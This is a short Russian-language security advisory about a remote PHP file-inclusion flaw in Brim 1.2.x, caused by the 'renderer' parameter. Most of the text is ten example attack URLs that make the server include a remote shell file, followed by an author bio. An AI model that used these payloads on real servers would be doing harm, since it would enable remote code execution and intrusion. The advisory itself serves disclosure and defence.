PHP-инклюдинг в Brim

Программа: Brim 1.2.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "renderer" множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Примеры:

http://www.target.***/[path]/templates/barrel/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/sidebar/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/text-only/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/slashdot/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/penguin/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/pda/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/oerdec/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/nifty/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/mylook/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/barry/template.tpl.php?renderer=http://shell.txt?

Анатолий Ализар: Бывший автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.
Похожие материалы